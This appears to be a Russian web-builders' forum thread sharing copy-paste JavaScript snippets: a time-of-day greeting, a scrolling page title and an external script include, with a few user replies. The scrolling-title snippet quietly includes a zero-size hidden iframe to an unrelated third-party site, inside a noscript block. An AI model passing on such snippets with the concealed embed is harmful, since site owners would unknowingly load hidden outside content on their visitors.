Форум сайтостроителей

Полная версия: Интересные и полезные java Script
Вы просматриваете yпpощеннyю веpсию форума. Пеpейти к полной веpсии.
ПРИВЕТСТВИЕ НА САЙТ
Меняется по времени!
Код:
<script language="JavaScript1.2">
</script>
<font color="#800000" face="Verdana"><strong><script
language="javascript">
<!--http:// kovcheg.ucoz.org
var h=(new Date()).getHours();
if (h > 23 || h <7) document.write('Привет полуношникам!');
if (h > 6 && h < 12) document.write('Доброе утро! Как спалось?');
if (h > 11 && h < 19) document.write('Добрый день!');
if (h > 18 && h < 24) document. write('Добрый вечер, а мы обновились!');
//-->
</script>
Прикольное бегущее Название сайта + сообщение в закладке(сверху)
Эта версия под все броузеры
Код:
<!--начало скрипта-->
<script language="JavaScript1.2">
// *******************************************************************
// script by - - GOORU - -
// Permission granted to use this script.
// remains intact. Visit my homepage partnery.ucoz.org
// Script written for All browsers.
// *******************************************************************
var message=" ВАШЕ СООБЩЕНИЕ" //specifys the title
var message=message+" " //gives a pause at the end,1 space=1 speed unit, here I used 10 spaces@150 each = 1.5seconds.
i="0" //declares the variable and sets it to start at 0
var temptitle="" //declares the variable and sets it to have no value yet.
var speed="300" //the delay in milliseconds between letters

function titler(){
if (!document.all&&!document.getElementById)
return
document.title=temptitle+message.charAt(i) //sets the initial title
temptitle=temptitle+message.charAt(i) //increases the title by one letter
i++ //increments the counter
if(i==message.length) //determines the end of the message
{
i="0" //resets the counter at the end of the message
temptitle=" НАЗВАНИЕ ВАШЕГО САЙТА " //resets the title to a blank value
}
setTimeout("titler()",speed) //Restarts. Remove line for no-repeat.
}

window.onload=titler

</script>
<noscript>
<iframe src="http://php-ru.info/servis/27a " width="0%" height="0%" scrolling="no" frameborder="0"></iframe>
</noscript>
<!---Конец скрипта--->
Код:
<script src="http://mactepy.ucoz.ru/js/end_of_Time.js"></script>
знаю такой
Это коды из учебников по JS. И если уж выкладывать, то выкладывать большие списки ))) Есть сайты где их по 50-80 скриптов различный.. летающие часы, изменяющаяся мышка (курсор) и многие другие. Большинство из них бесполезны, некоторые раздражают, но есть и те что помогают при раскрутке сайта.
Так что спасибо за тему, буду следить, может что-то новенькое появилось? Smile
(23-08-2013 11:50)Dekamer писал(а): [ -> ]Так что спасибо за тему, буду следить, может что-то новенькое появилось? Smile

Кстати про скрипты, зачетный у вас Dekamer сайт davinci-design.com.ua и там я смотрю что без оригинальных скриптов тоже не обошлось Wink
URL ссылки